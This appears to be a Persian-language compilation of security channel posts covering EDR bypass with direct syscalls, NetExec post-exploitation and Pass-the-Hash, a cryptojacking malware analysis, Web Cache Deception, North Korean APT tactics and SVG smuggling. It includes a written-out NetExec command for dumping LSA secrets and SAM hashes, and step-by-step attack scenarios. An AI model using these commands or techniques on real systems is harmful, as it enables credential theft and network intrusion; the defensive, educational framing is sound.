تکنیک ۳: استفاده از Syscalls مستقیم (Direct Syscalls)

این یک روش پیشرفته‌تر برای دور زدن هوکینگ User-Mode است. به جای فراخوانی تابع OpenProcess از ntdll.dll (که توسط EDR هوک شده)، مهاجم مستقیماً "system call" مربوطه را فراخوانی می‌کند.

چگونه کار می‌کند؟

1. هر تابع سطح بالای API در نهایت به یک فراخوانی سیستمی (syscall) برای ارتباط با کرنل ختم می‌شود.

2. ابزار مهاجم، به جای استفاده از کتابخانه‌های ویندوز، کد اسمبلی (Assembly) لازم برای اجرای مستقیم syscall (مثلاً syscall یا int 0x2e) را پیاده‌سازی می‌کند.

3. از آنجایی که این فراخوانی، لایه ntdll.dll را دور می‌زند، قلاب‌های EDR هرگز اجرا نشده و درخواست مستقیماً به کرنل ارسال می‌شود. این تکنیک نیز به شرطی موفق است که دفاع اصلی EDR در سطح کرنل نباشد.


حالا سناریوی یک حمله را در نظر بگیرید

دسترسی اولیه و سرقت اطلاعات ☠️:

استفاده از اطلاعات برای حرکت جانبی ☠️:

اینجا دقیقاً جایی است که NetExec وارد میدان می‌شود. مهاجم حالا با در دست داشتن هش NTLM یک کاربر ادمین، از NetExec استفاده می‌کند تا👇:

با استفاده از تکنیک Pass-the-Hash، به صدها یا هزاران سیستم دیگر در همان شبکه احراز هویت کند.

دستورات را از راه دور بر روی آن سیستم‌ها اجرا کند (مثلاً از طریق ماژول‌های wmiexec یا smbexec).

همان ابزار dump کردن LSASS را بر روی سیستم‌های دیگر نیز اجرا کرده و اطلاعات بیشتری جمع‌آوری کند.

سرویس‌های جدید ایجاد کند، فایل آپلود یا دانلود کند و به طور کلی کنترل خود را در کل شبکه گسترش دهد.

☠️ وقتی سروری را هک می‌کنید، می‌خواهید به این اسرار دسترسی پیدا کنید. برای انجام این کار، می‌توانید از ابزار NetExec (که جانشین مدرن CrackMapExec است) استفاده کنید :

این دستور یکی از کلاسیک‌ترین و در عین حال قدرتمندترین دستورات در فاز پس از بهره‌برداری (Post-Exploitation) در محیط‌های Active Directory است.

nxc smb (target) -u Admin -p (pass) --lsa 

معمولاً شما پایگاه داده SAM را که حاوی هش NT حساب‌های محلی است، نیز dump می‌کنید . استخراج این اطلاعات ساده به نظر می‌رسد، اما در باطن اتفاقات زیادی رخ داده است. NetExec سه کندوی رجیستری زیر را استخراج کند:

۔HKLM\SAM: شامل هش‌های NT حساب‌های محلی است.

۔HKLM\SECURITY: حاوی اطلاعات محرمانه‌ی LSA است.

۔HKLM\SYSTEM: حاوی اطلاعات مورد نیاز برای رمزگشایی پایگاه داده SAM و اطلاعات محرمانه LSA است.

نکات کلیدی برای تیم‌های آبی (Blue Teams):

* مانیتورینگ بارگذاری درایورها بارگذاری هرگونه درایور جدید و ناشناس روی سیستم‌های حساس باید به دقت بررسی و تحلیل شود.

* سخت‌گیری در سطح کرنل فعال‌سازی قابلیت‌هایی مانند HVCI (Hypervisor-protected Code Integrity) می‌تواند بارگذاری درایورهای امضانشده یا آسیب‌پذیر را بسیار دشوارتر کند.

* تحلیل رفتاری: به جای تکیه صرف بر شناسایی API-Hooking، باید روی تحلیل‌های رفتاری تمرکز کرد. برای مثال، کدام پروسس‌ها در تلاش برای خواندن حافظه LSASS هستند، حتی اگر این تلاش موفقیت‌آمیز باشد.

@NullError_ir

✅#Cryptojacking

یک بدافزار استخراج ارز دیجیتال اخیراً کشف شده است، که با سوءاستفاده از برنامه داخلی Character Map ویندوز به عنوان میزبان اجرا، توجه تیم‌های امنیتی در سراسر جهان را به خود جلب کرده است.

تحلیل بدافزار Cryptojacking جدید

در دنیای امنیت سایبری، مهاجمان همواره در جستجوی روش‌های نوین و خلاقانه برای دور زدن سازوکارهای امنیتی و پنهان کردن فعالیت‌های مخرب خود هستند. به تازگی، یک زنجیره حمله پیچیده و نوآورانه شناسایی شده است که در آن، یک بدافزار با بهره‌گیری از تکنیک‌های (Living off the Land - LotL) و سوءاستفاده از یک ابزار کاملاً قانونی و معتبر ویندوز، یعنی Character Map (charmap.exe) ، سیستم قربانی را به یک ماینر پنهان تبدیل می‌کند. این نوشته تحلیل فنی بدافزار را تشریح می‌کند.

آناتومی حمله: از PowerShell تا تزریق

این حمله چندمرحله‌ای، نمونه‌ای برجسته از بدافزارهای (Fileless) است که با هدف به حداقل رساندن ردپای خود بر روی دیسک و گریز از شناسایی توسط آنتی‌ویروس‌های سنتی طراحی شده است.

مرحله ۱: دسترسی اولیه از طریق PowerShell

نقطه شروع حمله، اجرای یک اسکریپت مخرب PowerShell به نام infect.ps1 است. این اسکریپت از طریق یک اتصال HTTP از یک سرور خارجی مشکوک (C2) بر روی سیستم قربانی دانلود می‌شود. استفاده از PowerShell به عنوان بردار اولیه حمله بسیار رایج است، زیرا این ابزار قدرتمند به صورت پیش‌فرض بر روی تمامی نسخه‌های مدرن ویندوز نصب بوده و از اعتماد بالایی در محیط‌های سازمانی برخوردار است. هوشمندی مهاجمان در این مرحله، استفاده از یک User-Agent جدید و نادر برای اتصال PowerShell است که اولین زنگ خطر را برای سیستم‌های نظارت بر شبکه (مانند راه‌حل‌های NDR) به صدا در می‌آورد.

مرحله ۲: رمزگشایی و آماده‌سازی لودر چندلایه

اسکریپت infect.ps1 به شدت مبهم‌سازی (Obfuscate) شده است. این اسکریپت حاوی چندین قطعه داده (blob) است که با استفاده از الگوریتم‌های Base64 و XOR رمزنگاری شده‌اند. این لایه‌های متعدد رمزنگاری، تحلیل ایستا (Static Analysis) اسکریپت را بسیار دشوار می‌کند.

پس از اجرا، اسکریپت PowerShell این قطعات داده را در حافظه (RAM) رمزگشایی می‌کند. یکی از این قطعات ، یک فایل اجرایی AutoIt را تشکیل می‌دهد. AutoIt یک زبان اسکریپت‌نویسی رایگان است که برای خودکارسازی وظایف در ویندوز طراحی شده، اما متأسفانه به ابزاری محبوب برای مهاجمان جهت ساخت لودرهای بدافزار تبدیل شده است. این اسکریپت AutoIt وظیفه اصلی حمله، یعنی تزریق کد مخرب به یک پروسس قانونی، را بر عهده دارد.


مرحله ۳: تکنیک خلاقانه تزریق (Process Injection) با هدف قرار دادن charmap.exe

اینجا، خلاقانه‌ترین و نگران‌کننده‌ترین بخش حمله رخ می‌دهد. لودر AutoIt به جای اجرای مستقیم بدافزار (که به راحتی توسط نرم‌افزارهای امنیتی شناسایی می‌شود)، از تکنیک Process Injection استفاده می‌کند. اما هدف این تزریق، یک پروسس سیستمی رایج مانند svchost.exe یا explorer.exe نیست. مهاجمان به طرز هوشمندانه‌ای ابزار Windows Character Map (charmap.exe) را انتخاب کرده‌اند.

چرا charmap.exe ؟

* قانونی و مورد اعتماد: این یک ابزار کاملاً قانونی و امضاشده توسط مایکروسافت است که حضور و اجرای آن در سیستم هیچ‌گونه شکی را برنمی‌انگیزد.

* عدم نظارت: charmap.exe معمولاً جزو پروسس‌هایی نیست که به طور دقیق توسط تیم‌های امنیتی یا ابزارهای EDR نظارت شود.

* سادگی: این یک پروسس سبک و ساده است که بستر مناسبی برای تزریق کد بدون ایجاد ناپایداری در سیستم فراهم می‌کند.

لودر AutoIt ابتدا پروسس charmap.exe را در حالت سایلنت اجرا می‌کند. سپس، با کسب دسترسی کامل به فضای حافظه پروسس ، یک ناحیه حافظه جدید با قابلیت نوشتن و اجرا (Writable and Executable) تخصیص می‌دهد.

مرحله ۴: استقرار و اجرای پی‌لود نهایی (NBMiner)

در گام نهایی، لودر، پی‌لود اصلی یعنی بدافزار استخراج رمزارز NBMiner را که تا این لحظه به صورت رمزنگاری‌شده در حافظه نگهداری می‌شد، با استفاده از یک کلید XOR جدید (مثلاً 47) رمزگشایی کرده و آن را مستقیماً در فضای حافظه تخصیص‌داده‌شده در پروسس charmap.exe می‌نویسد. سپس یک Thread جدید در این پروسس ایجاد کرده و اجرای ماینر را آغاز می‌کند.

از این لحظه به بعد، فعالیت مخرب استخراج رمزارز در پوشش یک پروسس کاملاً قانونی و بی‌خطر ویندوز انجام می‌شود. این تکنیک، شناسایی بدافزار را برای راه‌حل‌های امنیتی سنتی که بر اساس نام پروسس یا امضای فایل کار می‌کنند، تقریباً غیرممکن می‌سازد.

✅#Stole

چگونه داده‌های خصوصی بدون شکستن حتی یک رمز، به سرقت میرود

در دنیای امنیت وب، همواره شاهد ظهور روش‌های خلاقانه و نوینی برای نفوذ و سرقت اطلاعات هستیم. یکی از این تکنیک‌های هوشمندانه و خطرناک، حمله (Web Cache Deception) است. این حمله به مهاجم اجازه می‌دهد تا با فریب دادن مکانیزم‌های (Caching) در سطح وب‌سرور یا شبکه‌های توزیع محتوا (CDN)، به اطلاعات خصوصی و حساس کاربران دسترسی پیدا کند، بدون آنکه نیاز به شکستن رمز عبور یا حتی یافتن یک آسیب‌پذیری پیچیده در منطق برنامه داشته باشد.

این نوشته، به تشریح این حمله می‌پردازد و نشان می‌دهد که چگونه یک پیکربندی اشتباه ساده می‌تواند به افشای اطلاعات مهمی مانند نام، ایمیل، اطلاعات پروفایل و حتی داده‌های مالی کاربران منجر شود.

این مکانیزم حمله چگونه کار می‌کند؟

برای درک این حمله، ابتدا باید با مفهوم (Web Caching) آشنا شویم. سیستم‌های Cach ، نسخه‌ای از فایل‌های استاتیک وب‌سایت (مانند تصاویر، فایل‌های CSS و جاوا اسکریپت) را در خود ذخیره می‌کنند تا در درخواست‌های بعدی، محتوا را با سرعت بسیار بالاتری به کاربران تحویل دهند. این کار باعث کاهش بار روی سرور اصلی و افزایش چشمگیر سرعت بارگذاری سایت می‌شود.

حمله فریب Cach وب از یک پیکربندی نادرست در این سیستم بهره‌برداری می‌کند. در حالت ایده‌آل، سیستم Cach باید فقط فایل‌های عمومی و استاتیک را ذخیره کند. اما مشکل زمانی آغاز می‌شود که وب‌سرور به گونه‌ای پیکربندی شده باشد که محتوای داینامیک و خصوصی (مانند صفحه پروفایل کاربر) را نیز بر اساس پسوند فایل در URL، به عنوان یک فایل استاتیک شناسایی و Cach کند.

مراحل اصلی حمله به شرح زیر است:

1. شناسایی هدف: مهاجم ابتدا یک صفحه حساس در وب‌سایت را شناسایی می‌کند که حاوی اطلاعات خصوصی کاربر لاگین کرده است. برای مثال، https://example.com/profile .

2. فریب سیستم Cach: مهاجم، قربانی را ترغیب می‌کند تا روی یک لینک دستکاری‌شده کلیک کند. این لینک، در ظاهر به یک فایل استاتیک بی‌خطر اشاره دارد، اما در واقع به صفحه پروفایل کاربر منتهی می‌شود. به عنوان مثال:
https://example.com/profile/logo.png

3. پیکربندی اشتباه سرور: وب‌سرور یا CDN به دلیل پیکربندی اشتباه، به انتهای URL نگاه می‌کند (/logo.png). از آنجایی که پسوند .png معمولاً برای فایل‌های استاتیک است، سرور فریب می‌خورد.

4۔ Cach شدن محتوای خصوصی: سرور، محتوای داینامیک و خصوصی صفحه پروفایل قربانی را (که شامل نام، ایمیل و سایر اطلاعات شخصی اوست) به عنوان یک فایل استاتیک با نام logo.png در حافظه Cach عمومی خود ذخیره می‌کند.

5. دسترسی مهاجم: اکنون مهاجم به سادگی با مراجعه به همان URL (https://example.com/profile/logo.png) می‌تواند به نسخه Cach‌شده از صفحه پروفایل قربانی، که حاوی تمام اطلاعات خصوصی اوست، دسترسی پیدا کند.


سناریوی حمله: مطالعه


گام اول: شناسایی و تحلیل

مهاجم متوجه شد که وب‌سایت از یک سیستم Cachینگ قوی برای افزایش سرعت استفاده می‌کند. او صفحه‌ی پروفایل شخصی خود را که آدرس آن به صورت https://target.com/account/profile بود، بررسی کرد. این صفحه حاوی اطلاعات حساسی مانند نام کامل، آدرس ایمیل، تاریخ تولد و اطلاعات مالی بود.

او سپس سعی کرد با اضافه کردن یک پسوند فایل استاتیک به انتهای URL، رفتار سرور را آزمایش کند. لینکی شبیه به این ساخت:
https://target.com/account/profile/styles.css

گام دوم: بهره‌برداری

پس از اینکه مهاجم با حساب کاربری خود روی لینک بالا کلیک کرد، اتفاق جالبی رخ داد. او سپس از حساب خود خارج شد (Logout) و دوباره به همان URL مراجعه کرد. در کمال تعجب، او توانست تمام محتوای صفحه پروفایل خود را مشاهده کند، در حالی که دیگر در سایت لاگین نبود!

این آزمایش ثابت کرد که سیستم Cach، محتوای داینامیک صفحه /account/profile را به دلیل وجود پسوند /styles.css به عنوان یک فایل استاتیک شناسایی و در حافظه پنهان عمومی ذخیره کرده است.

گام سوم: سرقت اطلاعات قربانی

اکنون مهاجم تنها به یک چیز نیاز دارد: اینکه قربانی روی لینک مخرب کلیک کند. این کار می‌تواند از طریق روش‌های مختلف مهندسی اجتماعی مانند ارسال یک ایمیل فیشینگ یا قرار دادن لینک در یک صفحه وب دیگر انجام شود.

فرض کنید مهاجم لینک زیر را برای قربانی ارسال می‌کند:
https://target.com/account/profile/avatar.jpg

به محض اینکه قربانی (که در حساب کاربری خود لاگین است) روی این لینک کلیک می‌کند، سیستم Cach، یک کپی از صفحه پروفایل او را تحت عنوان avatar.jpg ذخیره می‌کند. چند لحظه بعد، مهاجم با مراجعه به همین آدرس، به تمام اطلاعات خصوصی قربانی دسترسی خواهد داشت.

✅#North_Korean_hackers

## افشای تاکتیک‌های پیشرفته گروه‌های هکری کره شمالی: از مهندسی اجتماعی تا جنگ سایبری اقتصادی

گروه‌های هکرهای (APT) وابسته به کره شمالی، که با نام‌هایی چون Lazarus ، Kimsuky و Andariel (APT45) شناخته می‌شوند، به طور فزاینده‌ای در حال تکامل تاکتیک‌های خود هستند. این گروه‌ها که زمانی عمدتاً بر جاسوسی سایبری متمرکز بودند، اکنون به بازیگرانی چندوجهی تبدیل شده‌اند که اهدافشان از سرقت‌های مالی عظیم و حملات به زیرساخت‌های حیاتی تا عملیات‌های اختلال و باج‌گیری گسترش یافته است. تحلیل‌های اخیر از منابع معتبر امنیتی، تصویری جامع از زرادخانه تکنیکی و استراتژیک این بازیگران دولتی ارائه می‌دهد.

این نوشته به بررسی تاکتیک‌ها، تکنیک‌ها و رویه‌های این گروه‌ها می‌پردازد.


۱. مهندسی اجتماعی: هنر فریب در مقیاس بزرگ

ستون فقرات عملیات‌های کره شمالی، مهندسی اجتماعی فوق‌العاده پیچیده و هدفمند است. آن‌ها با درک عمیق از روانشناسی انسان، قربانیان را به برداشتن اولین قدم در زنجیره حمله ترغیب می‌کنند.

* جعل هویت و فرصت‌های شغلی فریبنده: یکی از موفق‌ترین تاکتیک‌های آن‌ها، ایجاد پروفایل‌های جعلی در شبکه‌های اجتماعی حرفه‌ای مانند لینکدین (LinkedIn) است. هکرها خود را به عنوان استخدام‌کننده از شرکت‌های بزرگ فناوری و دفاعی جا زده و با ارائه پیشنهادهای شغلی وسوسه‌انگیز، محققان امنیتی، مهندسان و توسعه‌دهندگان نرم‌افزار را هدف قرار می‌دهند. فرآیند "استخدام" شامل ارسال فایل‌های آلوده تحت پوشش آزمون‌های مهارتی، اسناد پروژه یا فرم‌های استخدامی است.

* فیشینگ نیزه‌ای (Spear-Phishing) هدفمند: برخلاف فیشینگ عمومی، ایمیل‌های آن‌ها به دقت برای هر قربانی شخصی‌سازی می‌شود. این ایمیل‌ها با جعل هویت شخصیت‌های برجسته، خبرنگاران یا کارشناسان، حاوی موضوعاتی مرتبط با حوزه کاری قربانی (مانند مسائل هسته‌ای، سیاست خارجی یا ارزهای دیجیتال) هستند تا اعتماد او را جلب کرده و به باز کردن پیوست‌های مخرب یا کلیک بر روی لینک‌های آلوده وادارند.

* تاکتیک ClickFix : در این روش، قربانی که در یک فرآیند مصاحبه شغلی جعلی قرار گرفته، به یک وب‌سایت فریبنده هدایت می‌شود. در آنجا از او خواسته می‌شود برای تکمیل یک ارزیابی مهارتی، دستوراتی را (معمولاً با استفاده از ابزار curl) در خط فرمان خود کپی و اجرا کند. این دستورات در واقع بدافزار را از یک سرور دیگر دانلود و اجرا می‌کنند.

۲. زنجیره تأمین نرم‌افزار: نفوذ از طریق بسته‌های متن‌باز

یکی از نگران‌کننده‌ترین تحولات، هدف‌گیری زنجیره تأمین نرم‌افزار است. مهاجمان با آلوده کردن بسته‌ها و کتابخانه‌های متن‌باز محبوب، به شبکه‌های هزاران توسعه‌دهنده و سازمان به صورت همزمان نفوذ می‌کنند.

* جعل برند: هکرها بسته‌های مخربی را با نام‌های بسیار شبیه به کتابخانه‌های معتبر در مخازن عمومی مانند npm (برای Node.js) و PyPI (برای Python) منتشر می‌کنند. توسعه‌دهندگان به دلیل یک اشتباه تایپی ساده، نسخه آلوده را دانلود و در پروژه‌های خود استفاده می‌کنند.

* تزریق کد مخرب: پس از نصب، این بسته‌های آلوده انواع ابزارهای جاسوسی مانند کی‌لاگرها ، (Clipboard Stealers) و (Credential Harvesters) را روی سیستم توسعه‌دهنده فعال می‌کنند. این کار به مهاجمان دسترسی بلندمدت به کد منبع، کلیدهای API و زیرساخت‌های حساس سازمان را می‌دهد.

۳. بهره‌برداری از پلتفرم‌های اطلاعاتی

در یک حرکت هوشمندانه و کنایه‌آمیز، گروه‌های کره شمالی خود از ابزارهایی که برای ردیابی آن‌ها ساخته شده، برای بهبود عملیاتشان استفاده می‌کنند.

* بررسی زیرساخت قبل از حمله: مهاجمان قبل از خرید و استفاده از دامنه‌ها و IPهای جدید برای سرورهای فرماندهی و کنترل (C2)، آن‌ها را در پلتفرم‌هایی مانند VirusTotal و Validin بررسی می‌کنند تا اطمینان حاصل کنند که این زیرساخت‌ها قبلاً به عنوان مخرب شناسایی و در لیست سیاه قرار نگرفته‌اند.

* پایش شناسایی: آن‌ها به طور مداوم این پلتفرم‌ها را برای یافتن نشانه‌هایی از کشف شدن عملیات خود رصد می‌کنند. این کار به آن‌ها اجازه می‌دهد تا در صورت لو رفتن یک زیرساخت، به سرعت آن را کنار گذاشته و از جایگزین استفاده کنند و به این ترتیب، تداوم عملیات خود را حفظ نمایند.

۴. تاکتیک‌های فنی و بدافزاری

در کنار مهندسی اجتماعی، این گروه‌ها از مجموعه‌ای پیشرفته از ابزارها و تکنیک‌های فنی برای نفوذ و پنهان‌کاری بهره می‌برند.

* تغییر استراتژی به سمت باج‌افزار: گروه‌هایی مانند Andariel که زیرمجموعه Lazarus محسوب می‌شوند، علاوه بر جاسوسی، به طور فزاینده‌ای از باج‌افزار برای کسب درآمد مستقیم یا به عنوان پوششی برای عملیات‌های مخرب‌تر استفاده می‌کنند. این یک تغییر استراتژیک از جاسوسی صرف به سمت عملیات‌های مخرب اقتصادی است.

✅#SWF_SVG

کمپین بدافزاری پیشرفته : مسلح‌سازی فایل‌های SVG و SWF برای حملات پنهانکارانه (شروع از کلمبیا)

اخیراً یک کمپین بدافزاری پیچیده و هدفمند، کاربران در کلمبیا را با استفاده از تکنیک‌های خلاقانه و پنهانکارانه مورد حمله قرار داده است. این کمپین که با نام Shadow Vector نیز شناخته می‌شود، با سوءاستفاده از فایل‌های گرافیکی (SVG) و فایل‌های فلش (SWF)، مکانیزم‌های امنیتی سنتی را دور زده و بدافزارهای دسترسی از راه دور (RATs) خطرناکی مانند AsyncRAT و RemcosRAT را بر روی سیستم قربانیان نصب می‌کند. در تشریح جزئیات این حملات، با تمرکز ویژه بر تکنیک‌های پیشرفته فرار از تشخیص (Evasion Techniques) که توسط مهاجمان به کار گرفته شده، با ما باشید.

زنجیره حمله: از ایمیل فیشینگ تا کنترل کامل سیستم

حمله با یک ایمیل فیشینگ هدفمند (Spear-Phishing) آغاز می‌شود. این ایمیل‌ها با مهندسی اجتماعی دقیق طراحی شده و خود را به عنوان یک ابلاغیه یا اعلان قضایی فوری از سوی نهادهای دولتی کلمبیا جا می‌زنند. این رویکرد، حس اضطرار و اعتماد را در قربانی القا کرده و او را به باز کردن پیوست ترغیب می‌کند.

1. پیوست مخرب (SVG) برخلاف حملات رایج که از فایل‌های اجرایی یا اسناد آفیس استفاده می‌کنند، در این کمپین از یک فایل SVG به عنوان پیوست استفاده می‌شود. فایل‌های SVG، که مبتنی بر XML هستند، توسط مرورگرهای وب به عنوان تصویر رندر می‌شوند. همین ویژگی باعث می‌شود بسیاری از فیلترهای امنیتی ایمیل، آن‌ها را به عنوان فایل‌های بی‌خطر طبقه‌بندی کنند.

2. اجرای کد در مرورگر هنگامی که قربانی فایل SVG را باز می‌کند، این فایل مستقیماً در مرورگر او اجرا می‌شود. مهاجمان کد مخرب JavaScript را درون تگ‌های <noscript> فایل SVG جاسازی کرده‌اند.

3. تکنیک قاچاق (SVG Smuggling) کد جاوا اسکریپت فعال شده، یک فایل آرشیو ZIP رمزگذاری شده (معمولاً حاوی بدافزار) را که به صورت Base64 در خود فایل SVG کدگذاری شده است، بازسازی و رمزگشایی می‌کند و سپس یک پنجره دانلود را به کاربر نمایش می‌دهد تا فایل را ذخیره کند. این تکنیک که به "قاچاق SVG" معروف است، به مهاجمان اجازه می‌دهد تا محموله مخرب را بدون نیاز به دانلود مستقیم از یک سرور خارجی، به سیستم قربانی منتقل کنند.

4. بارگذاری چندمرحله‌ای فایل ZIP دانلود شده، حاوی ترکیبی از یک فایل اجرایی قانونی و یک فایل DLL مخرب است. با اجرای فایل قانونی، تکنیک DLL Side-Loading فعال شده و به جای DLL اصلی، DLL مخرب بارگذاری و اجرا می‌شود.

5. نصب بدافزار نهایی در نهایت، این زنجیره منجر به اجرای بدافزارهای خطرناکی مانند AsyncRAT و RemcosRAT می‌شود. این تروجان‌های دسترسی از راه دور، کنترل کامل سیستم قربانی را به مهاجم می‌دهند و امکان سرقت اطلاعات حساس، کی‌لاگینگ (ثبت کلیدهای فشرده شده) و حتی اجرای باج‌افزار را فراهم می‌آورند.

تکنیک‌های فرار از تشخیص: قلب تپنده عملیات

موفقیت این کمپین به شدت به تکنیک‌های هوشمندانه‌ای که برای پنهان ماندن از دید ابزارهای امنیتی به کار می‌گیرد، وابسته است. این تکنیک‌ها نشان‌دهنده سطح بالای بلوغ فنی و عملیاتی مهاجمان است.

۱. سوءاستفاده از فرمت‌های فایل قابل اعتماد (SVG & SWF)
مهاجمان عمداً فرمت‌هایی را انتخاب کرده‌اند که کمتر توسط سیستم‌های امنیتی به عنوان تهدید شناخته می‌شوند. SVG به عنوان یک فرمت تصویری، اغلب از بررسی‌های دقیق امنیتی عبور می‌کند. توانایی این فرمت در اجرای کدهای JavaScript، آن را به یک ابزار ایده‌آل برای مرحله اولیه نفوذ تبدیل کرده است.

۲. مبهم‌سازی چندلایه (Multi-Layered Obfuscation)
کدهای JavaScript جاسازی شده در فایل SVG به شدت مبهم‌سازی شده‌اند تا تحلیل ایستا (Static Analysis) را غیرممکن یا بسیار دشوار سازند. این مبهم‌سازی شامل موارد زیر است:

* کدگذاری Base64: بخش‌های اصلی کد و محموله نهایی به صورت رشته‌های Base64 کدگذاری می‌شوند و در لحظه اجرا رمزگشایی می‌گردند.

* تکنیک‌های پلی‌مورفیک: هر نمونه از فایل SVG توزیع‌شده، دارای تغییرات جزئی در کد و ساختار است. این تغییرات باعث می‌شود که امضاهای مبتنی بر فایل (File-based Signatures) کارایی خود را از دست بدهند.

* تزریق کدهای زائد (Garbage Code): مقادیر زیادی کد بی‌معنی و زائد به فایل اضافه می‌شود تا انتروپی فایل را افزایش داده و ابزارهای تحلیل خودکار را به اشتباه بیندازد.


۳. دور زدن کنترل حساب کاربری (UAC Bypass)
پس از نفوذ اولیه، بدافزار برای اجرای عملیات با سطح دسترسی بالاتر، از تکنیک‌های شناخته‌شده برای دور زدن مکانیزم User Account Control (UAC) در ویندوز استفاده می‌کند. این کار به بدافزار اجازه می‌دهد تا بدون نمایش هشدارهای امنیتی به کاربر، تغییرات مهمی در سیستم ایجاد کند.

✅#Programming_Languages

زبان‌های برنامه‌نویسی برای امنیت سایبری

نکته : ترتیب و شماره گذاری دلیل ارجحیت زبان های برنامه نویسی بر یکدیگر نیست

امنیت سایبری دیگر یک انتخاب نیست، بلکه یک ضرورت است. با افزایش روزافزون تهدیدات دیجیتال، تقاضا برای متخصصان ماهر امنیت سایبری به شدت افزایش یافته است. یکی از مهارت‌های کلیدی در این حوزه، تسلط بر زبان‌های برنامه‌نویسی است. اما با وجود گزینه‌های متعدد، کدام زبان برای یک متخصص امنیت سایبری بهترین انتخاب است؟

این راهنما به شما کمک می‌کند تا با زبان‌های برنامه‌نویسی برای امنیت سایبری در مقطع کنونی و کاربردهایشان آشنا شوید.

چرا متخصصان امنیت سایبری به برنامه‌نویسی نیاز دارند؟

* فرایندها را خودکار کنند: اسکریپت‌نویسی برای خودکارسازی وظایف تکراری مانند اسکن شبکه، تحلیل لاگ‌ها و شناسایی ناهنجاری‌ها، کارایی را به شدت بالا می‌برد.

* ابزارهای سفارشی بسازند: گاهی ابزارهای موجود برای یک نیاز خاص کافی نیستند. توانایی ساخت ابزارهای سفارشی برای تست نفوذ، تحلیل بدافزار یا فارنزیک دیجیتال یک مزیت بزرگ است.

* کدهای مخرب را درک و تحلیل کنند: برای مقابله با بدافزارها، ابتدا باید بتوانید کد آن‌ها را درک، مهندسی معکوس و تحلیل کنید.

* آسیب‌پذیری‌ها را در کد منبع پیدا کنند: با بررسی کد منبع (Source Code Review)، می‌توان آسیب‌پذیری‌ها را قبل از آنکه توسط مهاجمان اکسپلویت شوند، شناسایی و رفع کرد.

* حملات را شبیه‌سازی کنند: ساخت اسکریپت‌ها و برنامه‌هایی برای شبیه‌سازی حملات (مانند حملات فیشینگ یا اسکریپت‌نویسی بین سایتی - XSS) به درک بهتر مکانیزم‌های دفاعی کمک می‌کند.


انتخاب زبان برنامه‌نویسی مناسب به حوزه تخصصی شما در امنیت سایبری بستگی دارد. در ادامه، بهترین زبان‌ها بر اساس کاربردشان دسته‌بندی شده‌اند.

۱۔ پایتون (Python): پادشاه بی‌چون‌وچرای امنیت سایبری

پایتون به دلیل سادگی، خوانایی بالا و کتابخانه‌های قدرتمند و گسترده، محبوب‌ترین زبان در میان متخصصان امنیت سایبری است.

* کاربردها:

* خودکارسازی وظایف (Automation): کتابخانه‌هایی مانند os , subprocess و shutil برای خودکارسازی وظایف امنیتی ایده‌آل هستند.

* تست نفوذ (Penetration Testing): ابزارهای معروفی مانند Scapy (برای دستکاری پکت‌های شبکه) ، Requests (برای تعامل با وب‌سرویس‌ها) و BeautifulSoup (برای وب اسکرپینگ) همگی مبتنی بر پایتون هستند.

* تحلیل بدافزار (Malware Analysis): کتابخانه‌هایی چون Pydbg و Volatility به تحلیل رفتار بدافزارها کمک می‌کنند.

* اسکن شبکه: ساخت اسکنرهای پورت و شبکه با استفاده از سوکت‌های پایتون بسیار ساده است.

* چرا پایتون؟

* یادگیری آسان: سینتکس ساده و نزدیک به زبان انگلیسی، آن را به گزینه‌ای عالی برای مبتدیان تبدیل کرده است.

* جامعه بزرگ و پشتیبانی قوی: هزاران کتابخانه و فریم‌ورک آماده برای امنیت سایبری وجود دارد و جامعه کاربری بزرگی برای حل مشکلات در دسترس است.

* چندمنظوره بودن: از توسعه وب تا یادگیری ماشین و امنیت سایبری، پایتون در همه جا کاربرد دارد.


۲۔ جاوا اسکریپت (JavaScript): زبان وب و امنیت آن

با توجه به اینکه اکثر حملات مدرن از طریق وب‌اپلیکیشن‌ها انجام می‌شود، تسلط بر جاوا اسکریپت برای هر متخصص امنیت وب ضروری است.

* کاربردها:

* امنیت سمت کلاینت (Client-Side Security): درک نحوه عملکرد جاوا اسکریپت در مرورگر به شناسایی و مقابله با حملاتی مانند Cross-Site Scripting (XSS) و Cross-Site Request Forgery (CSRF) کمک می‌کند.

* تحلیل کدهای مخرب: بسیاری از اسکریپت‌های مخرب که در وب‌سایت‌ها تزریق می‌شوند، با جاوا اسکریپت نوشته شده‌اند.

* توسعه ابزارهای تست نفوذ وب: فریم‌ورک Node.js به متخصصان اجازه می‌دهد تا ابزارهای قدرتمندی برای اسکن وب‌سایت‌ها و خودکارسازی حملات شبیه‌سازی‌شده بسازند.

* چرا جاوا اسکریپت؟

* فراگیری: تقریباً تمام وب‌سایت‌های مدرن از جاوا اسکریپت استفاده می‌کنند.

* قدرت در سمت سرور: با Node.js ، جاوا اسکریپت به یک زبان قدرتمند برای توسعه ابزارهای شبکه‌ای و سمت سرور تبدیل شده است.

* جامعه فعال: ابزارها و فریم‌ورک‌های بیشماری مانند JSHint و ESLint برای تحلیل و امن‌سازی کد جاوا اسکریپت وجود دارند.


۳۔ Bash/PowerShell: زبان‌های فرمان برای سیستم‌عامل‌ها

این دو زبان اسکریپت‌نویسی، ابزارهای اصلی برای تعامل مستقیم با سیستم‌عامل‌های لینوکس (Bash) و ویندوز (PowerShell) هستند.

✅#Punycode

تحلیل عمیق آسیب‌پذیری تصاحب حساب کاربری
(زیرو کلیک) با بهره‌برداری از Punycode

در دنیای امنیت سایبری، آسیب‌پذیری‌های "بدون کلیک" به دلیل ماهیت پنهان و خطرناک خود، همواره از اهمیت ویژه‌ای برخوردار بوده‌اند. این نوع حملات به مهاجم اجازه می‌دهند بدون نیاز به هرگونه تعامل از سوی قربانی، تنها با ارسال یک پیام یا داده‌ی خاص، کنترل سیستم یا حساب کاربری او را به دست بگیرند. به تازگی، یک محقق امنیتی از یک مکانیزم هوشمندانه و نگران‌کننده برای تصاحب کامل حساب کاربری در پلتفرم Rocket.Chat پرده برداشت که بر پایه‌ی یک استاندارد قدیمی اما کمتر شناخته‌شده به نام Punycode عمل می‌کند.

برای تشریح کامل و فنی این آسیب‌پذیری به دلیل طولانی بودن مطلب فایل pdf را مطالعه بفرمایید

@NullError_ir

✅#Reverse_Engineering


چرا به مهندسی معکوس نیاز داریم؟

تصور کنید با یک فایل اجرایی مشکوک روبرو شده‌اید. شما نمی‌دانید این فایل دقیقاً چه کاری انجام می‌دهد. آیا اطلاعات شما را سرقت می‌کند؟ آیا سیستم شما را به بخشی از یک بات‌نت تبدیل می‌کند؟ یا شاید یک باج‌افزار است که منتظر فرصتی برای رمزنگاری فایل‌های شماست؟

